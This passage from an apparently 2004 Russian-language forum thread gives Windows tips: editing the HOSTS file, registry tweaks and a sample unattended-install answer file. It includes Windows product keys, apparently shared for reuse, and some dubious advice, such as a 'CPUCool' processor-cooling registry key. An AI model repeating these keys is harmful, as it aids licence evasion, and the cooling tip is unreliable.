OrgName=UpravlenieK ComputerName=Server-UpravleniyaK ! ProductID=MPK8Q-JYKV4-2JCP3-74TCV-DRP8W Проблемные места я отметил восклицательным знаком. По названию каждого пункта можно догадаться, что он означает и изменять приведенную выше ПРИМЕРНУЮ конфигурацию как угодно. Quote Link to post Share on other sites
SUNUN Posted February 3, 2004 Author Report Share Posted February 3, 2004 Очень интересный файл HOSTS - рулите своим браузером (Windows XP) Оказывается, в Windows XP есть очень хороший способ управления Интернетом. Тем более, что он не требует никаких дополнительных средств. По адресу WINDOWSsystem32driversetc можно обнаружить крошечный файл HOSTS. Именно он может определить какие сайты достойны Вашего внимания, какие - нет, какие баннеры можно показывать, а какие нет, наконец, именно он может существенно ускорить загрузку часто посещаемого сайта. Этот файл определяет соотношение IP адреса и доменного имени. То есть, исходя из основ, при запросе адреса, допустим в строке адреса вы набрали www.Super-sait.ru, компьютер должен связаться с одним (а можно и с несколькими) DNS. Затем этот самый сервис преобразует имя в удобоваримый для компьютера IP адрес. Для www.Super-sait.ru - это к примеру 63.138.223.36. После этого сайт загружается. При правильном подходе к файлу HOSTS можно указать брузеру адрес сайта напрямую, обходя всякие DNS. Это ускоряет загрузку выбранного web сервера. По умолчанию, в этом файле только одна запись: 127.0.0.1 localhost. И для использования свойств этого файла необходимо прописать корректно следующую информацию: 63.138.223.36 www.Super-sait.ru # Вначале вводим IP, а затем имя сервера. Пробел обязателен. Так же, управляя этим файлом можно запретить доступ к некоторым сайтам вообще. Это можно сказать тот же метод, что и В IE только с огромными преимуществами. Во-первых, об этом способе мало кто знает, во-вторых, он касается не только IE но и всех остальных браузеров. Для использования этой функции необходимо ввести: 127.0.0.1 porno.ru # Система будет искать этот ресурс у себя на винчестере, само собой, она его не найдет и выдаст сообщение об ошибке. Так же, если подумать немного можно получить ещё кое-какую пользу от использования этого файла. Quote Link to post Share on other sites
SUNUN Posted February 23, 2004 Author Report Share Posted February 23, 2004 Полезные советы по реестру ВНИМАНИЕ данная статья предназначена только для опытных пользователей. Не опытное обращение с реестром может повлечь за собой выход компьютера из строя! На данной странице под словом "указанный ключ" понимается адрес, написанный в самом конце совета. Почти все примеры приведенные здесь в которых присутствует создание нового параметра подразумевают, что данный параметр является строковым (String), а где нужно создать иной параметр (двоичный (Binary) или DWORD) я буду об этом упоминать. Если после редактирования реестра ни чего не изменилось, то перезагрузите ваш компьютер и проверьте правильность внесенных изменений! Отключение кэширования паролей Если вы обеспокоены безопасностью ваших паролей (в PWL-файлах) и паролей ваших родных (тоже работающих на вашем компе), то вы можете отключить кэширование паролей (будут создаваться пустые PWL`ки). Это достигается добавлением параметра DisablePwdCaching (тип параметра: REG_DWORD) и присвоению этому параметру значения - 1. Этот параметр нужно создать в следующем ключе реестра: [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesNetwork] Автозапуск CD-ROM`а (WinXP) Создаем параметр Autorun (если его еще нет) и присваеваем ему: 0 - для отключения автозапуска или 1 для включения. Ключ: [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesCDRom] Удаляем PC Health (Win ME) Если вас задолбал PC Health, который жрет много места, то его можно легко удалить. Создаем строковый параметр displayname и присваиваем ему имя PC Health, потом идем в Установка и удаление программ, находим там PC Health и ... . Ключ: [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionUninstall]PC Health] Контекстное меню IE Переименовать или удалить некоторые команды из контекстное меню IE вызываемого кликом по ссылке можно в следующем ключе. Ключ: [HKEY_CURRENT_USERSOFTWAREMicrosoftInternet ExplorerMenuExt] Чистим главное меню В ключе, который хранит информацию о порядке расположения папок и ярлыков в главном меню всегда бывает очень много мусора. А именно, когда вы сами удалите или переместите любую папку, деинсталируете прогу и тд. Короче, несуществующие разделы вы можете смело удалять! Ключ:[HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionExplorerMenuOrderSt art MenuPrograms] Включение Num Lock при запуске Windows (2000/XP) Для включения клавиши Num Lock при запуске Windows присваиваем строковому параметру InitialKeyboardIndicators значение 2, а чтобы она не включалась присваиваем параметру 1 . Ключ: [HKEY_CURRENT_USERControl PanelKeyboard] Автоисправление в Scandisk`е (ME) После неправильного выключения компьютера и при следующей загрузке автоматически запускается Scandisk с установленной галочкой "Исправлять ошибки автоматически", которую нельзя снять! Для того, чтобы галочка отсутствовала по умолчанию надо установить двоичный параметр AutoChk в значение 02,00,00,00, а чтобы ее вернуть в 00,00,00,00 . Ключ: [HKEY_USERS.DEFAULTSOFTWAREMicrosoftWindowsCurrentVersionAppletsCheck Drive] Анимация для окон Для того, чтобы можно было включать или отключать "Видеоэффекты для меню и подсказок" через реестр, нужно попасть в указанный ключ реестра и создать новый параметр (если его там еще нет) MinAnimate и присвоить ему значение 1, если хотите чтобы анимация была включена или 0, чтобы она была отключена. Ключ: [HKEY_CURRENT_USERControl PanelDesktopWindowMetrics] Изменение скорости открытия главного меню Для тех кто забыл: главное меню - это меню вызываемое при нажатии кнопки "Пуск" на панели задач. Идем по указанному ключу и создаем новый строковый параметр MenuShowDelay и присваиваем ему значение от 1 до 10, что соответствует скорости открытия меню. Изменения должны вступить в силу после перезагрузки. Ключ: [HKEY_CURRENT_USERСontrol PanelDesktop] Установка путей к системным папкам Для того, чтобы изменить пути к системным папкам, нужно залезть в указанный ключ реестра из изменить следующие параметры: "ProgramFilesDir" - папка Program Files "CommonFilesDir" - папка Common Files "SystemRoot" - папка Windows "MediaPath" - папка Media "ConfigPath" - папка Config "DevicePath" - папка INF Ключ: [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion] Имя рядом с часами В указанном ключе создаём 3 строковых параметра (порядок следует соблюдать): "s1159" со значением "Ваше имя" (не более 8 символов). "s2359" со значением "такое же, как и у первого". "sTimeFormat" со значением "HH:mm:ss tt" или "tt HH:mm:ss", где tt обозначает введенный вами текст. Ключ: [HKEY_CURRENT_USERControl panelinternational] Изменение заголовка окна Internet Explorer (9x/NT) Используя ключ указанный ниже, вы можете изменить заданный по умолчанию заголовок окна "Microsoft Internet Explorer", на что ни будь вроде "Мир интернет". Используя RegEdit, откройте этот ключ, создайте в нем новый строковый параметр под названием "Window Title", установите его значение равным строке, которую вы хотели бы видеть в области заголовка. Для сброса к значению по умолчанию, удалите параметр "Window Title". Ключ: [HKEY_CURRENT_USERSOFTWAREMicrosoftInternet ExplorerMain] Параметр: Window Title Как избавиться от имени в окне "Установка и удаление программ" В ниже указанном ключе хранятся все 32-разрядные программы. Чтобы удалить объект из списка надо, кликнуть по нему и нажать на клавишу "DEL". Ключ: [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrent VersionUninstall] Где находятся команды, введенные в окне выполнить Они находятся под ниже указанным ключом в столбце против букв "a", "b", "c" и т.д. И их можно спокойно удалять! Ключ: [HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionExplorerRunMRU] Как изменить имя владельца и назвние организации Заходим в ниже указанный ключ. Находим строковый параметр Registered Owner и изменяем его значение на ваше имя. Registered Organization - на название вашей организации. Ключ: [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrent Version] Создание ярлыка к системным папкам Следующие действия позволяют вам создать своеобразный ярлык к многим системным папкам вашего компьютера и разместить его где угодно. Для этого надо создать папку и назвать её, например "Корзина.{645FF040-5081-101B-9F08-00AA002F954E}". После этих действий должен появиться значок (не ярлык) «Корзины». С этим объектом можно проводить любые действия. Тот же самое можно сделать и для других системных папок, изменив значения на: Удаленный доступ к сети - «Удаленный доступ к сети.{992CFFA0-F557-101A-88EC-00DD010CCC48}» Принтеры - «Принтеры.{2227A280-3AEA-1069-A2DE-08002B30309D}» Панель управления - «Панель управления.{21EC2020-3AEA-1069-A2DD-08002B30309D}» Мой компьютер - «Мой компьютер.{20D04FE0-3AEA-1069-A2D8-08002B30309D}» Сетевое окружение - «Сетевое окружение.{208D2C60-3AEA-1069-A2D7-08002B30309D}» Входящие - «Входящие.{00020D75-0000-0000-C000-000000000046}» Корзина - «Корзина.{645FF040-5081-101B-9F08-00AA002F954E}» Для получения информации по другим папкам посмотрите ключ HKEY_CLASSES_ROOTCLSID Ключ: [HKEY_CLASSES_ROOTCLSID] Убираем все надписи Идём по ниже указанному ключу. Именно там Windows и хранит информацию о цвете кнопок, надписей, о цвете ползунков и т.п. Теперь меняем значения строковых параметров на: У "Button text" на "192 192 192" У "Window text" на "256 256 256" У "Menu Text" на "192 192 192" У "Info Text" на "192 192 192" После этих действий перезагрузитесь и почти всех надписей уже не будет. Ключ: [HKEY_CURRENT_USERControl PanelColors] Меняем протокол в IE заданный по умолчанию Заходим в ниже указанный ключ и меняем значение параметра "По умолчанию" с http:// на ftp:// или на gopher:// . Ключ: [HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrent VersionUrlDefaultPrefix] Меняем стандартные значки Для этого идем по ниже указанному ключу и создаем следующие параметры: "1" - Default Document "2" - Приложение "3" - Закрытая папка "4" - Открытая папка "6" - 3.5 Дюйиовый дисковод "7" - Сменный жесткий диск "8" - Жесткие диски "9" - Сетевые диски "11" - CD-ROM Drive "12" - RAM Drive "19" - Программы "20" - Документы "21" - Настройка "22" - Найти "23" - Поиск "24" - Выполнить "27" - Завершение работы "25" - Приостановить работу "36" - Программная группа "29" - Ярлык "34" - Desktop "40" - Audio CD [HKEY_CLASSES_ROOTCLSD{21EC2020-3AEA-1069-A2DD-08002B30309D}DefaultIcon] "По умолчанию" - Панель управления [HKEY_CLASSES_ROOTCLSD{2227A280-3AEA-1069-A2DE-08002B30309D}DefaultIcon] "По умолчанию" - Принтеры Нужно не забывать ставить в адресе к иконке двойной слеш () и в случае *.ICO - файла в конце адреса через запятую ставиить 0. Пример "C:Filesicon.ico,0". Ключ: [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionexplorerShell Icons] Изменение многоцветности иконок Для изменения способности отображать многоцветность иконок, изменяем значение параметра с 16 на 24 или даже на 32bit! Ключ: [HKEY_CURRENT_USERControlPaneldesktopWindowMetrics] Параметр: shell icon bpp Версия над системная часами Чтобы над системными часами отображалась версия Windows 98, надо в Реестре изменить(создать) строковый параметр "PaintDesktopVersion" со значения "0"(нет) на "1"(есть картинка). Ключ: [HKey_Current_UserControl PanelDesktop] Охлаждение процессора Вы знаете, что в Windows (начиная с 98SE) встроенна программа охлаждения процессора (CPU) под названием CPUCool? Если нет, тогда читайте дальше! Проблема состоит в том, что по умолчанию она отключена. Идем по ниже указанному ключу. Создаем в нем новый раздел - CPUCool, а внем новый строковый параметр типа DWORD - "Idle" со значением "1". Ключ: [HKEY_LOCAL_MACHINESystemCurrentControlSetControl] Преписка к версии Windows Идем по ниже указанному ключу. Находим параметр SubVersionNumber и изменяем его значение. Только не забудьте поставить впереди пробел, а то фраза прилипнет к версии Windows. Теперь вы получите, что то вроде "4.10.1998 "Ваша фраза" ". Теперь можете любоваться (Панель управленияСистема). Строковый параметр Version показывает, что за Windows у вас стоит, а параметр VersionNumber его версию. Ключ: [HKEY_LOCAL_MACHINESOFTWAREMICROSOFTWINDOWSCURRENTVERSION] Автозагрузка Если при запуске Windows у вас запускаются разные программы которые вам не нужны при загрузке, а в меню ПускПрограммыАвтозагрузка их нет, то ищите проги по следующим ключам: HKEY_CURRENT_USERSoftware MicrosoftWindowsCurrentVersionRun HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServices HKEY_USERS.DEFAULTSoftwareMicrosoftWindowsCurrentVersionRun Quote Link to post Share on other sites
SUNUN Posted February 23, 2004 Author Report Share Posted February 23, 2004 Автоматический метод установки Windows Существует автоматический метод установки операционных систем семейства Windows, заключающийся в подготовке специального файла ответов на возможные вопросы программы установки и запуске программы установки с ключом, указывающим на этот файл. После чего система устанавливается в автоматическом режиме, не задавая никаких вопросов пользователю. Для Windows 98 и Windows Me - это хорошо известный файл msbatch.inf. Для Windows 2000 также существует аналогичный механизм, а имя файла по умолчанию Unattend.txt. Ключи программы установки. Запуск программы установки осуществляется командой: из среды MS-DOS или Windows 3.1/Windows for Workgroups: winnt /u: /s: /t: /rx: из среды Windows 95 or Windows 98, Windows NT®, или Windows 2000: winnt32 /unattend: /s: [/syspart:] [/copysource:] [/tempdrive:] где: файл, содержащий ответы на возможные вопросы программы установки (по умолчанию Unattend.txt). расположение инсталяционных файловWindows 2000 диск, на который устанавливаем систему и размещаем временные файлы. /syspart указывает программе установки скопировать загрузочные файлы на жесткий диск, пометить диск как активный и затем установить диск на другом компьютере. Когда этот компьютер запускается, он автоматически переходит на следующую фазу установки. Параметр /syspart всегда следует использовать вместе с параметром /tempdrive. Параметр /syspart для Winnt32.exe используется только на компьютерах с Windows NT 3.51, Windows NT 4.0 или Windows 2000. В системах Windows 9x он не предусмотрен /tempdrive назначает размещение временных файлов в заданном разделе и установку в нем Windows 2000 /t тоже самое, что /tempdrive, но для Winnt.exe /copysource cоздает временную дополнительную папку внутри папки, в которую устанавливаются файлы Windows 2000. /rx тоже самое, что / copysource, но для Winnt.exe Замечание: Используйте /t or /tempdrive ключи для установки Windows 2000 в раздел, отличный от загрузочного. Конечно, существуют и другие ключи, если интересно, то набери winnt32 /? Или winnt /? Итак, потрудимся. Вставляем чистую дискету и создаем в обычном текстовом редакторе файл Unattend.bat, в котором набиваем: H:I386winnt32.exe /unattend: a:Unattend.txt /s:H: /tempdrive:F где H: - CD ROM твоего компьютера Формат файла ответов. Теперь подготовим файл ответов Unattend.txt. Файл ответов - это обычный текстовый файл. Его структура стандартна для INI файлов Windows (win.ini и system.ini файлы имеют аналогичную структуру) - это разделы, заключенные в квадратные скобки и внутри каждого раздела - параметры со своими значениями, разделенные знаком равенства. Если значение имеет пробел, то его заключают в двойные кавычки. Как названия разделов, так и названия параметров строго предопределены. Допускаются комментарии, начинающиеся с точки с запятой (. Доступных для настройки параметров очень много и рассказать о каждом, практически нереально. Поэтому мы рассмотрим только основные, если тебя заинтересует, то почитаешь соответствующую документацию - "Microsoft Windows 2000 Guide to Unattended Setup" в файле Unattend.doc, находящимся на CD с дистрибутивом Microsoft Windows 2000 в архиве SupportTools Deploy.cab. И так, опять запускаем текстовый редактор, создаем файл Unattend.txt и набираем (комментарий следует за описываемым параметром, их можно не набирать): [unattended] ; секция означает, что будет выполняться автоматическая установка Windows. DriverSigningPolicy= Ignore ; определяет политику по отношению к драйверам, которые не проверены и не подписаны Microsoft. Возможные значения Ignore, Warn, Block , где: Ignore - продолжаем установку в любом случае (мы лучше знаем какой драйвер подойдет), Warn - прервем установку и спросим, Block - не устанавливать драйвер. FileSystem= LeaveAlone ; определяет, какая файловая система у Вас будет, возможные значения: LeaveAlone - оставить без изменений, ConvertNTFS - форматировать в NTFS OemPnPDriversPath="DriversVideo; DriversIntel_PC_Camera" ; определяет пути к папкам, содержащим Plug and Play драйверы, которые не входят в поставку Windows 2000 CD. Папка должна содержать все необходимые драйверы для конкретного устройства. Букву диска указывать не надо. Setup самостоятельно добавит %systemdrive% для каждой папки OemFilesPath="MyBMP" ; определяем папку, в которой будут лежать рисунки, логотипы OemSkipEula=Yes ; определяет, будет ли предложено принять лицензионное соглашение (End User License Agreement or EULA), возможные значения: Yes, No. Yes - подразумевает, что лицензия прочитана и принята. No - Вам предложат принять лицензионное соглашение. TargetPath=Win2000 ; определяет папку, куда будет устанавливаться Windows 2000, возможные значения * или . * - программа установки сама создаст уникальное имя по следующему шаблону Winnt.x, (где x - 0, 1,…,999). Букву диска указывать не надо, так как она задается ключом /tempdrive (или /t). UnattendMode= DefaultHide ; определяет автоматический режим установки, который используется во 2-ой (графической) стадии установки, возможные значения GuiAttended, ProvideDefault, DefaultHide, ReadOnly, FullUnattended. GuiAttended - пользователю нужно отвечать на вопросы. ProvideDefault -пользователю предлагается запрос на ввод значений соответствующих параметров, а значения по умолчанию берутся из файла ответов. Пользователь может изменять значения. DefaultHide - ответы из файла ответов используются по умолчанию, ничего не отображается, если какого ответа нет, то будет выведен экран, где отобразятся все параметры и можно будет как ввести недостающий ответ, так и подправить полученные из файла ответов. ReadOnly - то же, что и предыдущее значение, только пользователь не сможет ничего поменять. ReadOnly одним словом. FullUnattended - полностью автоматический режим, все берется из файла ответов, если чего нет, то произойдет ошибка. OemPreinstall=Yes ; определяет, будет ли установка выполняться из дистрибутивной папки, созданной на жестком диске. [GuiUnattended] AdminPassword=1 ; пароль администратора. Если *, то Null OEMSkipRegional=1 ; пропустить запрос региональных установок - 1 или нет - 0 OEMSkipWelcome=1 ; пропустить страницу Welcome in GUI-mode Setup - 1 Продолжение ProfilesDir="C:Documents and Settings " ; устанавливает папку, в которой будут храниться профили Windows 2000. По умолчанию - "%systemdrive%Documents and Settings". Но это неправильно, так как противоречит концепции раздельного размещения ОС и данных. Поэтому явно прописываем другой диск. TimeZone=145 ; определяем временную зону, 145 - это Россия, 180 - Россия (Екатеринбург), 270 Россия (Владивосток), если не указывать, то программа установки спросит сама [userData] ; пользовательские настройки ComputerName="Rafter Home PC" ; устанавливает имя компьютера (не более 63 символов, если больше, то обрежет), если не указать, то спросят, если *, то сгенерируется случайное имя, основанное на имени организации. FullName="Rafter" ; устанавливает имя пользователя, если не указать, то спросят. OrgName="Rafter home PC studio" ; устанавливает имя организации, если не указать, то спросят. ProductID="M9G4D-R4T4R-J9QQ6-4VXBW-9YM43" ; устанавливает ID номер ОС (то, что на обложке диска) [Display] ; определяет параметры настройки экрана BitsPerPel=16 ; определяет количество цветов, отображаемых на экране, так 8 - это 256 цветов, а 16 - 65536 Vrefresh=75 ; определяет частоту обновления экрана Xresolution=1024 ; определяет разрешение по X Yresolution=768 ; определяет разрешение по Y [RegionalSettings] ; определяет региональные установки. 419 - это Россия, 5 - это кириллица LanguageGroup=5 Language= L0419 [OEM_Ads] ; секция позволяет изменить логотип, отображаемый в верхнем правом углу экрана и фоновую картинку отображаемые во время загрузки. Путь к картинкам задается параметром OemFilesPath в секции [unattended]. Теперь ты как и брэндовые производители сможешь выделиться Logo=MyLogo.BMP Background=MyBackGround.BMP [TapiLocation] ; Секция TapiLocation определяет телефонные коды AreaCode=8452 ; определяет междугородний телефонный код CountryCode=7 ; телефонный код страны Dialing=Pulse ; определяет тоновый Tone или импульсный Pulse режим набора номера LongDistanceAccess ; определяет выход с ведомственной АТС в город [setupMgr] ; определяет куда с CD скопируем дистрибутив и расшаривает эту папку DistFolder=F:win2000dist DistShare=win2000dist [branding] ; Intrnet Explorer также настраиваем автоматически BrandIEUsingUnattended=Yes [FavoritesEx] ; заполняем Избранное Intrnet Explorer! Title1="Почта.url" URL1="bashnet.ru" Title2="Полезное.url" URL2="inside.bashnet.ru" ; определяем адреса домашней странички и поисковой машины Home_Page=inside.bashnet.ru Search_Page=www.google.com [Proxy] ; а здесь можно настроить прокси Proxy_Enable=1 ; использовать 1 или не использовать 0 прокси Use_Same_Proxy=0 ; использовать 1 или не использовать 0 один прокси для всех протоколов HTTP_Proxy_Server=proxy.bashnet.ru:3128 ; здесь прописываем прокси Secure_Proxy_Server=proxy.bashnet.ru:3128 FTP_Proxy_Server=proxy.bashnet.ru:3128 Gopher_Proxy_Server=proxy.bashnet.ru:3128 Socks_Proxy_Server=proxy.bashnet.ru:3128 Proxy_Override= ; здесь указали не использовать прокси для локальных адресов [identification] ; устанавливаем сетевую идентификацию компьютера JoinWorkgroup= RAFTERHOMENET ; имя рабочей группы, думаю, твой комп не входит в домен [Networking] ; заголовок секции должен присутствовать для автоматической установки сети InstallDefaultComponents=No [NetAdapters] Adapter1=params.Adapter1 [params.Adapter1] INFID=* [NetProtocols] ; устанавливаем сетевые протоколы ; ID протокола Протокол Устанавливаемые компоненты ;MS_TCPIP TCP/IP Protocol MS_NetBT ; MS_NWIPX IPX Protocol MS_NWSPX, MS_NWNB ; MS_PPTP Point-to-Point Tunneling Protocol ; MS_L2TP Layer 2 Tunneling Protocol ; MS_DLC DLC Protocol ; MS_AppleTalk AppleTalk Protocol ; MS_NetBEUI NetBEUI Protocol ; MS_NetMon Network Monitor Agent ; MS_ATMLANE ATM LAN Emulation Client ; MS_ATMUni ATM Call Manager Protocol ; MS_ATMArps ATM ARP Server Protocol ; MS_STREAMS STREAMS Protocol MS_TCPIP=params.MS_TCPIP ; протокол TCP/IP. Этот параметр устанавливает название секции, в которой будет производится тонкая настройка протокола. Если тебе нужны еще и другие протоколы, то сделай по аналогии [params.MS_TCPIP] ; название этой секции установлено параметром MS_TCPIP= params.MS_TCPIPздесь выполняется настройка протокола TCP/IP UseDomainNameDevolution=No EnableLMHosts=Yes AdapterSections=params.MS_TCPIP.Adapter1 [params.MS_TCPIP.Adapter1] SpecificTo=Adapter1 DHCP=Yes ; определяем, будет ли использоваться Dynamic Host Configuration Protocol (DHCP) при подключении WINS=No ; определяем, будет ли использоваться WINS при подключении NetBIOSOptions=2 ; определяем, будет ли использоваться NetBIOS поверх TCP/IP при подключении (0-использовать через DHCP сервер, 1-использовать через TCP/IP, 2-неиспользовать через TCP/IP) [Components] ; эта секция определяет устанавливаемые компоненты и есть реальная возможность установить только то, что нужно calc=Off ; Калькулятор cdplayer=Off ; CD Player charmap=On ; Character Map chat= Off ; Chat deskpaper=Off ; обои рабочего стола dialer=On ; Звонилка freecell=Off ; Игра Freecell hypertrm=On ; HyperTerminal media_clips=Off ; Примеры звуковых клипов media_utopia=Off ; Звуковая схема Utopia minesweeper=Off ; Игра сапер mousepoint=Off ; Набор указателей мыши mplay=Off ; Media Player mswordpad=On ; текстовый редактор WordPad netoc=On ;; дополнительные сетевые компоненты, определяемые в секции [NetOptionalComponents]. objectpkg=Off ; упаковщик объектов paint=On ; графический редактор Paint pinball=Off ; игра Pinball rec=Off ; запись звуков (Sound Recorder) solitaire=Off ; Игра Solitaire templates=On ; Шаблоны документов В помощь. Чтоб не набивать в текстовом редакторе файл unattend.txt, можно воспользоваться программой SetupMgr.exe. Живет она в папке SupportTools Deploy.cab компакт диска с дистрибутивом Windows 2000. В ней надо только расставить галочки и файл unattend.txt сформирован. По сути программа дублирует вопросы, которые могут встретиться во время установки. Создаваемый файл можно использовать только как основу, его придется подкорректировать ручками (например, придется подправить секцию [Components], добавить серийный номер дистрибутива и т.д.). Наиболее интересной, на мой взгляд, является возможность создать файл ответов, дублирующий конфигурацию твоего компьютера или подкорректировать существующий файл. В этом случае, тебе по умолчанию будут предъявляться установки твоего компьютера, которые ты можешь оставить такими как есть, или подправить на другие значения. Quote Link to post Share on other sites
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.